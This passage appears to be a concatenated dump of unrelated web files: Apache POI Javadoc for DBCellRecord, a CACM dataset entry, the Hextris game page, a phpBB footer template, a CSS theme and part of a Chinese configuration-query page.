<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
<B>Nested Class Summary</B></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>static class</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../../org/apache/poi/hssf/record/DBCellRecord.Builder.html" title="class in org.apache.poi.hssf.record">DBCellRecord.Builder</A></B></CODE>
<BR>
</TD>
</TR>
</TABLE>
<!-- =========== FIELD SUMMARY =========== -->
<A NAME="field_summary"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
<B>Field Summary</B></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>static int</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../../org/apache/poi/hssf/record/DBCellRecord.html#BLOCK_SIZE">BLOCK_SIZE</A></B></CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>static short</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../../org/apache/poi/hssf/record/DBCellRecord.html#sid">sid</A></B></CODE>
<BR>
</TD>
</TR>
</TABLE>
<!-- ======== CONSTRUCTOR SUMMARY ======== -->
<A NAME="constructor_summary"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
<B>Constructor Summary</B></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><CODE><B><A HREF="../../../../../org/apache/poi/hssf/record/DBCellRecord.html#DBCellRecord(org.apache.poi.hssf.record.RecordInputStream)">DBCellRecord</A></B>(<A HREF="../../../../../org/apache/poi/hssf/record/RecordInputStream.html" title="class in org.apache.poi.hssf.record">RecordInputStream</A> in)</CODE>
<BR>
</TD>
</TR>
</TABLE>
<!-- ========== METHOD SUMMARY =========== -->
<A NAME="method_summary"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
<B>Method Summary</B></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>static int</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../../org/apache/poi/hssf/record/DBCellRecord.html#calculateSizeOfRecords(int, int)">calculateSizeOfRecords</A></B>(int nBlocks,
int nRows)</CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> java.lang.Object</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../../org/apache/poi/hssf/record/DBCellRecord.html#clone()">clone</A></B>()</CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>protected int</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../../org/apache/poi/hssf/record/DBCellRecord.html#getDataSize()">getDataSize</A></B>()</CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> short</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../../org/apache/poi/hssf/record/DBCellRecord.html#getSid()">getSid</A></B>()</CODE>
<BR>
return the non static version of the id for this record.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../../org/apache/poi/hssf/record/DBCellRecord.html#serialize(org.apache.poi.util.LittleEndianOutput)">serialize</A></B>(<A HREF="../../../../../org/apache/poi/util/LittleEndianOutput.html" title="interface in org.apache.poi.util">LittleEndianOutput</A> out)</CODE>
<BR>
Write the data content of this BIFF record.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> java.lang.String</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../../org/apache/poi/hssf/record/DBCellRecord.html#toString()">toString</A></B>()</CODE>
<BR>
get a string representation of the record (for biffview/debugging)</TD>
</TR>
</TABLE>
<A NAME="methods_inherited_from_class_org.apache.poi.hssf.record.StandardRecord"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#EEEEFF" CLASS="TableSubHeadingColor">
<TH ALIGN="left"><B>Methods inherited from class org.apache.poi.hssf.record.<A HREF="../../../../../org/apache/poi/hssf/record/StandardRecord.html" title="class in org.apache.poi.hssf.record">StandardRecord</A></B></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><CODE><A HREF="../../../../../org/apache/poi/hssf/record/StandardRecord.html#getRecordSize()">getRecordSize</A>, <A HREF="../../../../../org/apache/poi/hssf/record/StandardRecord.html#serialize(int, byte[])">serialize</A></CODE></TD>
</TR>
</TABLE>
<A NAME="methods_inherited_from_class_org.apache.poi.hssf.record.Record"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#EEEEFF" CLASS="TableSubHeadingColor">
<TH ALIGN="left"><B>Methods inherited from class org.apache.poi.hssf.record.<A HREF="../../../../../org/apache/poi/hssf/record/Record.html" title="class in org.apache.poi.hssf.record">Record</A></B></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><CODE><A HREF="../../../../../org/apache/poi/hssf/record/Record.html#cloneViaReserialise()">cloneViaReserialise</A>, <A HREF="../../../../../org/apache/poi/hssf/record/Record.html#serialize()">serialize</A></CODE></TD>
</TR>
</TABLE>
<A NAME="methods_inherited_from_class_java.lang.Object"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#EEEEFF" CLASS="TableSubHeadingColor">
<TH ALIGN="left"><B>Methods inherited from class java.lang.Object</B></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><CODE>equals, finalize, getClass, hashCode, notify, notifyAll, wait, wait, wait</CODE></TD>
</TR>
</TABLE>
<P>
<!-- ============ FIELD DETAIL =========== -->
<A NAME="field_detail"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2">
<B>Field Detail</B></FONT></TH>
</TR>
</TABLE>
<A NAME="sid"><!-- --></A><H3>
sid</H3>
<PRE>
public static final short <B>sid</B></PRE>
<DL>
<DL>
<DT><B>See Also:</B><DD><A HREF="../../../../../constant-values.html#org.apache.poi.hssf.record.DBCellRecord.sid">Constant Field Values</A></DL>
</DL>
<HR>
<A NAME="BLOCK_SIZE"><!-- --></A><H3>
BLOCK_SIZE</H3>
<PRE>
public static final int <B>BLOCK_SIZE</B></PRE>
<DL>
<DL>
<DT><B>See Also:</B><DD><A HREF="../../../../../constant-values.html#org.apache.poi.hssf.record.DBCellRecord.BLOCK_SIZE">Constant Field Values</A></DL>
</DL>
<!-- ========= CONSTRUCTOR DETAIL ======== -->
<A NAME="constructor_detail"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2">
<B>Constructor Detail</B></FONT></TH>
</TR>
</TABLE>
<A NAME="DBCellRecord(org.apache.poi.hssf.record.RecordInputStream)"><!-- --></A><H3>
DBCellRecord</H3>
<PRE>
public <B>DBCellRecord</B>(<A HREF="../../../../../org/apache/poi/hssf/record/RecordInputStream.html" title="class in org.apache.poi.hssf.record">RecordInputStream</A> in)</PRE>
<DL>
</DL>
<!-- ============ METHOD DETAIL ========== -->
<A NAME="method_detail"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2">
<B>Method Detail</B></FONT></TH>
</TR>
</TABLE>
<A NAME="toString()"><!-- --></A><H3>
toString</H3>
<PRE>
public java.lang.String <B>toString</B>()</PRE>
<DL>
<DD><B>Description copied from class: <CODE><A HREF="../../../../../org/apache/poi/hssf/record/Record.html#toString()">Record</A></CODE></B></DD>
<DD>get a string representation of the record (for biffview/debugging)
<P>
<DD><DL>
<DT><B>Overrides:</B><DD><CODE><A HREF="../../../../../org/apache/poi/hssf/record/Record.html#toString()">toString</A></CODE> in class <CODE><A HREF="../../../../../org/apache/poi/hssf/record/Record.html" title="class in org.apache.poi.hssf.record">Record</A></CODE></DL>
</DD>
<DD><DL>
</DL>
</DD>
</DL>
<HR>
<A NAME="serialize(org.apache.poi.util.LittleEndianOutput)"><!-- --></A><H3>
serialize</H3>
<PRE>
public void <B>serialize</B>(<A HREF="../../../../../org/apache/poi/util/LittleEndianOutput.html" title="interface in org.apache.poi.util">LittleEndianOutput</A> out)</PRE>
<DL>
<DD><B>Description copied from class: <CODE><A HREF="../../../../../org/apache/poi/hssf/record/StandardRecord.html#serialize(org.apache.poi.util.LittleEndianOutput)">StandardRecord</A></CODE></B></DD>
<DD>Write the data content of this BIFF record. The 'ushort sid' and 'ushort size' header fields
have already been written by the superclass.<br/>
The number of bytes written must equal the record size reported by
<A HREF="../../../../../org/apache/poi/hssf/record/RecordBase.html#getRecordSize()"><CODE>RecordBase.getRecordSize()</CODE></A>} minus four
( record header consiting of a 'ushort sid' and 'ushort reclength' has already been written
by thye superclass).
<P>
<DD><DL>
<DT><B>Specified by:</B><DD><CODE><A HREF="../../../../../org/apache/poi/hssf/record/StandardRecord.html#serialize(org.apache.poi.util.LittleEndianOutput)">serialize</A></CODE> in class <CODE><A HREF="../../../../../org/apache/poi/hssf/record/StandardRecord.html" title="class in org.apache.poi.hssf.record">StandardRecord</A></CODE></DL>
</DD>
<DD><DL>
</DL>
</DD>
</DL>
<HR>
<A NAME="getDataSize()"><!-- --></A><H3>
getDataSize</H3>
<PRE>
protected int <B>getDataSize</B>()</PRE>
<DL>
<DD><DL>
<DT><B>Specified by:</B><DD><CODE><A HREF="../../../../../org/apache/poi/hssf/record/StandardRecord.html#getDataSize()">getDataSize</A></CODE> in class <CODE><A HREF="../../../../../org/apache/poi/hssf/record/StandardRecord.html" title="class in org.apache.poi.hssf.record">StandardRecord</A></CODE></DL>
</DD>
<DD><DL>
</DL>
</DD>
</DL>
<HR>
<A NAME="calculateSizeOfRecords(int, int)"><!-- --></A><H3>
calculateSizeOfRecords</H3>
<PRE>
public static int <B>calculateSizeOfRecords</B>(int nBlocks,
int nRows)</PRE>
<DL>
<DD><DL>
<DT><B>Returns:</B><DD>the size of the group of <tt>DBCellRecord</tt>s needed to encode
the specified number of blocks and rows</DL>
</DD>
</DL>
<HR>
<A NAME="getSid()"><!-- --></A><H3>
getSid</H3>
<PRE>
public short <B>getSid</B>()</PRE>
<DL>
<DD><B>Description copied from class: <CODE><A HREF="../../../../../org/apache/poi/hssf/record/Record.html#getSid()">Record</A></CODE></B></DD>
<DD>return the non static version of the id for this record.
<P>
<DD><DL>
<DT><B>Specified by:</B><DD><CODE><A HREF="../../../../../org/apache/poi/hssf/record/Record.html#getSid()">getSid</A></CODE> in class <CODE><A HREF="../../../../../org/apache/poi/hssf/record/Record.html" title="class in org.apache.poi.hssf.record">Record</A></CODE></DL>
</DD>
<DD><DL>
</DL>
</DD>
</DL>
<HR>
<A NAME="clone()"><!-- --></A><H3>
clone</H3>
<PRE>
public java.lang.Object <B>clone</B>()</PRE>
<DL>
<DD><DL>
<DT><B>Overrides:</B><DD><CODE><A HREF="../../../../../org/apache/poi/hssf/record/Record.html#clone()">clone</A></CODE> in class <CODE><A HREF="../../../../../org/apache/poi/hssf/record/Record.html" title="class in org.apache.poi.hssf.record">Record</A></CODE></DL>
</DD>
<DD><DL>
</DL>
</DD>
</DL>
<!-- ========= END OF CLASS DATA ========= -->
<HR>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<A NAME="navbar_bottom"><!-- --></A>
<A HREF="#skip-navbar_bottom" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_bottom_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="class-use/DBCellRecord.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../../org/apache/poi/hssf/record/DateWindow1904Record.html" title="class in org.apache.poi.hssf.record"><B>PREV CLASS</B></A>
<A HREF="../../../../../org/apache/poi/hssf/record/DBCellRecord.Builder.html" title="class in org.apache.poi.hssf.record"><B>NEXT CLASS</B></A></FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../../index.html?org/apache/poi/hssf/record/DBCellRecord.html" target="_top"><B>FRAMES</B></A>
<A HREF="DBCellRecord.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
<TR>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
SUMMARY: <A HREF="#nested_class_summary">NESTED</A> | <A HREF="#field_summary">FIELD</A> | <A HREF="#constructor_summary">CONSTR</A> | <A HREF="#method_summary">METHOD</A></FONT></TD>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
DETAIL: <A HREF="#field_detail">FIELD</A> | <A HREF="#constructor_detail">CONSTR</A> | <A HREF="#method_detail">METHOD</A></FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_bottom"></A>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<HR>
<i>Copyright 2012 The Apache Software Foundation or
its licensors, as applicable.</i>
</BODY>
</HTML>
|
InfoRetrievalSystem/dataset/CACM-0767.html | jrosseel/ProjectInformationRetrieval | <html>
<pre>
Certification of Algorithm 161
Combinatorial of M Things Taken One at a Time,
Two at a Time, Up to N at a Time
[M. L. Wolfson and H. V. Wright,
Comm. ACM, Apr. 1963]
CACM August, 1963
Thoro, D.
CA630831 JB March 13, 1978 8:13 PM
767 5 767
767 5 767
767 5 767
</pre>
</html>
|
index.html | Antarix/odakho-dev | <!DOCTYPE html>
<html lang='en'>
<head>
<title>Hextris</title>
<meta name="apple-itunes-app" content="app-id=903769553"/>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, minimal-ui"/>
<meta property="og:url" content="http://hextris.github.io/hextris/"/>
<meta property="og:site_name" content="Hextris"/>
<meta property="og:title" content="Hextris"/>
<meta property="og:description" content="An addictive puzzle game inspired by Tetris."/>
<meta property="og:type" content="website"/>
<meta property="og:author" content="https://www.facebook.com/hextris"/>
<meta property="og:image" content="http://hextris.github.io/hextris/images/facebook-opengraph.png"/>
<meta property="og:image:width" content="1200"/>
<meta property="og:image:height" content="630"/>
<meta property="twitter:card" content="summary"/>
<meta property="twitter:site" content="@hextris"/>
<meta property="twitter:site:id" content="2742209678"/>
<meta property="twitter:creator" content="@hextris"/>
<meta property="twitter:creator:id" content="2742209678"/>
<meta property="twitter:domain" content="http://hextris.github.io"/>
<meta property="twitter:title" content="Hextris"/>
<meta property="twitter:description" content="An addictive puzzle game inspired by Tetris."/>
<meta property="twitter:image:src" content="http://hextris.github.io/hextris/images/twitter-opengraph.png"/>
<meta property="twitter:image:width" content="512"/>
<meta property="twitter:image:height" content="512"/>
<meta property="twitter:app:id:iphone" content="id903769553">
<meta property="twitter:app:id:ipad" content="id903769553">
<meta property="twitter:app:id:googleplay" content="com.hextris.hextris">
<meta property="twitter:app:country" content="us">
<meta property="twitter:app:url:iphone" content="itunes.apple.com/us/app/id903769553?mt=8">
<meta property="twitter:app:url:ipad" content="itunes.apple.com/us/app/id903769553?mt=8">
<meta property="twitter:app:url:googleplay" content="https://play.google.com/store/apps/details?id=com.hextris.hextris">
<link rel="icon" type="image/png" href="favicon.ico">
<link href='http://fonts.googleapis.com/css?family=Exo+2' rel='stylesheet' type='text/css'>
<link rel="stylesheet" href="style/fa/css/font-awesome.min.css">
<link rel="stylesheet" type="text/css" href="style/style.css">
<script type='text/javascript' src="js/vendor/hammer.min.js"></script>
<script type='text/javascript' src="js/vendor/js.cookie.js"></script>
<script type='text/javascript' src="js/vendor/jsonfn.min.js"></script>
<script type='text/javascript' src="js/vendor/keypress.min.js"></script>
<script type='text/javascript' src="js/vendor/jquery.js"></script>
<script type='text/javascript' src="js/save-state.js"></script>
<script type='text/javascript' src="js/view.js"></script>
<script type='text/javascript' src="js/wavegen.js"></script>
<script type='text/javascript' src="js/math.js"></script>
<script type='text/javascript' src="js/Block.js"></script>
<script type='text/javascript' src="js/Hex.js"></script>
<script type='text/javascript' src="js/Text.js"></script>
<script type='text/javascript' src="js/comboTimer.js"></script>
<script type='text/javascript' src="js/checking.js"></script>
<script type='text/javascript' src='js/update.js'></script>
<script type='text/javascript' src='js/render.js'></script>
<script type='text/javascript' src="js/input.js"></script>
<script type='text/javascript' src="js/main.js"></script>
<script type='text/javascript' src="js/initialization.js"></script>
<script type='text/javascript' charset='utf-8' src='cordova.js'></script>
<script src="js/vendor/sweet-alert.min.js"></script>
<link rel="stylesheet" href="style/rrssb.css"/>
</head>
<body>
<canvas id="canvas"></canvas>
<div id="overlay" class="faded overlay"></div>
<div id='startBtn' ></div>
<div id="helpScreen" class='unselectable'>
<div id='inst_main_body'></div>
</div>
<img id="openSideBar" class='helpText' src="./images/btn_help.svg"/>
<div class="faded overlay"></div>
<img id="pauseBtn" src="./images/btn_pause.svg"/>
<img id='restartBtn' src="./images/btn_restart.svg"/>
<div id='HIGHSCORE'>HIGH SCORE</div>
<script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-51272720-2', 'auto'); ga('send', 'pageview');
</script>
<div id='highScoreInGameText'>
<div id='highScoreInGameTextHeader'>HIGH SCORE</div><div id='currentHighScore'>10292</div>
</div>
<div id="gameoverscreen">
<div id='container'>
<div id='gameOverBox' class='GOTitle'>GAME OVER</div>
<div id='cScore'>1843</div>
<div id='highScoresTitle' class='GOTitle'>HIGH SCORES</div>
<div class='score'><span class='scoreNum'>1.</span> <div id="1place" style="display:inline;">0</div></div>
<div class='score'><span class='scoreNum'>2.</span> <div id="2place" style="display:inline;">0</div></div>
<div class='score'><span class='scoreNum'>3.</span> <div id="3place" style="display:inline;">0</div></div>
</div>
<div id='bottomContainer'>
<img id='restart' src='./images/btn_restart.svg' height='57px'>
<div id='socialShare'>
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg width="224.6377px" height="57px" viewBox="0 0 255 65" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<title>Share button</title>
<defs>
</defs>
<g id="Page-1" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd" sketch:type="MSPage">
<g id="Game-over-" sketch:type="MSArtboardGroup" transform="translate(-95.000000, -565.000000)">
<g id="Share-button" sketch:type="MSLayerGroup" transform="translate(95.000000, 565.000000)">
<a style="cursor:pointer;"class="popup" onclick="window.open('https://twitter.com/intent/tweet?text=Can you beat my score of '+ score +' points at&button_hashtag=hextris ? http://hextris.github.io/hextris @hextris','name','width=600,height=400')" ><polygon id="Score-hex-2" fill="#3498DB" sketch:type="MSShapeGroup" transform="translate(127.661316, 32.500000) rotate(-90.000000) translate(-127.661316, -32.500000) " points="127.661316 -94.814636 160.137269 -76.064636 160.137269 141.064636 127.661317 159.814636 95.185364 141.064636 95.1853635 -76.064636 "></polygon></a>
<text style="cursor:pointer;"class="popup" onclick="window.open('https://twitter.com/intent/tweet?text=Can you beat my score of '+ score +' points at&button_hashtag=hextris ? http://hextris.github.io/hextris @hextris','name','width=600,height=400')" id="SHARE-MY-SCORE!" sketch:type="MSTextLayer" font-family="Exo" font-size="16" font-weight="420" fill="#FFFFFF">
<tspan x="67" y="39">SHARE MY SCORE!</tspan>
</text>
</g>
</g>
</g>
</svg>
</div>
<div id='buttonCont'>
</div>
</div>
</div>
<script type="text/javascript" src='js/vendor/rrssb.min.js'></script>
</body>
</html>
|
se_square/template/overall_footer.html | ruevecom/rueve-styles | <!-- EVENT overall_footer_content_after -->
</div>
<!-- EVENT overall_footer_page_body_after -->
<div id="page-footer" role="contentinfo">
<!-- INCLUDE navbar_footer.html -->
<div class="copyright">
<!-- EVENT overall_footer_copyright_prepend -->
{CREDIT_LINE}<br />SE Square by <a href="http://www.phpbb3bbcodes.com/">PhpBB3 BBCodes</a>
<!-- IF TRANSLATION_INFO --><br />{TRANSLATION_INFO}<!-- ENDIF -->
<!-- EVENT overall_footer_copyright_append -->
<br>© 2015-2016, <a href="http://ru-eve.com">RU-EVE.com</a> • 16+
<!-- IF DEBUG_OUTPUT --><br />{DEBUG_OUTPUT}<!-- ENDIF -->
<!-- IF U_ACP --><br /><strong><a href="{U_ACP}">{L_ACP}</a></strong><!-- ENDIF -->
</div>
<div id="darkenwrapper" data-ajax-error-title="{L_AJAX_ERROR_TITLE}" data-ajax-error-text="{L_AJAX_ERROR_TEXT}" data-ajax-error-text-abort="{L_AJAX_ERROR_TEXT_ABORT}" data-ajax-error-text-timeout="{L_AJAX_ERROR_TEXT_TIMEOUT}" data-ajax-error-text-parsererror="{L_AJAX_ERROR_TEXT_PARSERERROR}">
<div id="darken"> </div>
</div>
<div id="phpbb_alert" class="phpbb_alert" data-l-err="{L_ERROR}" data-l-timeout-processing-req="{L_TIMEOUT_PROCESSING_REQ}">
<a href="#" class="alert_close"></a>
<h3 class="alert_title"> </h3><p class="alert_text"></p>
</div>
<div id="phpbb_confirm" class="phpbb_alert">
<a href="#" class="alert_close"></a>
<div class="alert_text"></div>
</div>
</div>
</div>
<div>
<a id="bottom" class="anchor" accesskey="z"></a>
<!-- IF not S_IS_BOT -->{RUN_CRON_TASK}<!-- ENDIF -->
</div>
<script type="text/javascript" src="{T_JQUERY_LINK}"></script>
<!-- IF S_ALLOW_CDN --><script type="text/javascript">window.jQuery || document.write('\x3Cscript src="{T_ASSETS_PATH}/javascript/jquery.min.js?assets_version={T_ASSETS_VERSION}">\x3C/script>');</script><!-- ENDIF -->
<script type="text/javascript" src="{T_ASSETS_PATH}/javascript/core.js?assets_version={T_ASSETS_VERSION}"></script>
<!-- INCLUDEJS forum_fn.js -->
<!-- INCLUDEJS ajax.js -->
<!-- EVENT overall_footer_after -->
<!-- IF S_PLUPLOAD --><!-- INCLUDE plupload.html --><!-- ENDIF -->
{$SCRIPTS}
<!-- EVENT overall_footer_body_after -->
</body>
</html>
|
templates/tron/css/tron.css | mewin/AnyAdmin | body
{
font-family: courier;
background: #000000;
color: <!--@setting(text-color, #99ddff)-->;
min-height: 99%;
min-width: 99%;
}
/*
links
*/
a
{
color: inherit;
text-decoration: none;
border-bottom: 1px <!--@setting(text-color, #99ddff)--> dotted;
}
a:hover
{
color: <!--@setting(link-color, #4488bb)-->;
border-bottom: 1px <!--@setting(link-color, #99ddff)--> dotted;
}
a:active
{
color: <!--@setting(link-active-color, #ff0000)-->;
}
/*
boxes
*/
div.footer
{
position: fixed;
width: 99%;
left: 0;
bottom: 2px;
text-align: center;
}
div.header
{
position: absolute;
width: 99%;
left: 0;
top: 25px;
text-align: center;
}
div.message_warning, div.message_error
{
position: fixed;
z-index: 10;
top: 0;
left: 30%;
width: 40%;
min-height: 2em;
padding-top: 0.5em;
padding-bottom: 0.5em;
color: #000000;
border-bottom-right-radius: 5px;
border-bottom-left-radius: 5px;
text-align: center;
cursor: pointer;
}
div.message_warning
{
background-color: <!--@setting(warning-color, #ffff77)-->;
}
div.message_error
{
background-color: <!--@setting(error-color, #ff7777)-->;
}
form.loginForm
{
position: absolute;
top: 5px;
right: 10px;
}
div.tron_navi
{
padding-left: 20px;
width: 100%;
text-align: left;
}
div.tron_wrapper
{
position: absolute;
left: 5%;
top: 100px;
height: 80%;
width: 80%;
text-align: center;
margin-left: 20px;
}
div.tron_ovwrapper
{
width: 100%;
height: 80%;
border-bottom-left-radius: 10px;
border-bottom-right-radius: 10px;
border-bottom: 1px solid <!--@setting(text-color, #99ddff)-->;
padding: 20px;
overflow: auto;
display: inline-block;
text-align: left;
}
div.tron_headwrapper
{
position: absolute;
top: 0;
left: 0;
max-height: 100px;
z-index: 10;
}
/*
input fields
*/
input[type=text], input[type=password], input[type=email], input[type=url], input[type=number]
{
font-family: inherit;
color: <!--@setting(text-color, #99ddff)-->;
border: 0 none;
padding: 2px;
background: transparent;
border-bottom: 1px dashed <!--@setting(text-color, #99ddff)-->;
}
input[type=button], input[type=submit], input[type=reset], button
{
background: <!--@setting(text-color, #99ddff)-->;
color: #000000;
border: 0 none;
}
/*
default styles
*/
a.navi
{
display: inline-block;
min-width: 100px;
margin: 0;
padding-top: 5px;
padding-bottom: 10px;
padding-left: 20px;
padding-right: 20px;
margin-left: -20px;
margin-top: -5px;
text-align: center;
border-top: 1px solid <!--@setting(text-color, #99ddff)-->;
border-left: 1px solid <!--@setting(text-color, #99ddff)-->;
border-top-left-radius: 8px;
border-top-right-radius: 8px;
background: #000000;
}
div.overview
{
}
div.group
{
margin-left: 10px;
}
h1
{
font-size: 200%;
}
h2
{
font-size: 180%;
}
h3
{
font-size: 160%;
}
h4
{
font-size: 140%;
}
h5
{
font-size: 120%;
}
h6
{
font-weight: bold;
} |
public/v2/scmplatform/wait.html | xavier0509/scmplatform | <!--内容列表-->
<html>
<head>
<meta charset="utf-8" />
<title></title>
<link rel="stylesheet" type="text/css" href="../stylesheets/bootstrap.min.css">
<link rel="stylesheet" type="text/css" href="../stylesheets/other.css">
<script src="../javascripts/jquery.min.js"></script>
<script src="../javascripts/bootstrap.min.js"></script>
<script type="text/javascript" src="../javascripts/test.js"></script>
</head>
<body>
<div id="waitHomePage">
<fieldset class="inputandselectwidth">
<legend>配置文件查询</legend>
<!--机芯、机型、Device-->
<div class="row text-right">
<div class="col-xs-4 form-group">
<label for="chip" class="control-label col-xs-4">机芯</label>
<input type="text" value="" id="chip" class="col-xs-7 inputstyle">
</div>
<div class="col-xs-4 form-group">
<label for="model" class="control-label col-xs-4">机型</label>
<input type="text" value="" id="model" class="col-xs-7 inputstyle">
</div>
</div>
<div class="row text-right">
<div class="col-xs-4 form-group">
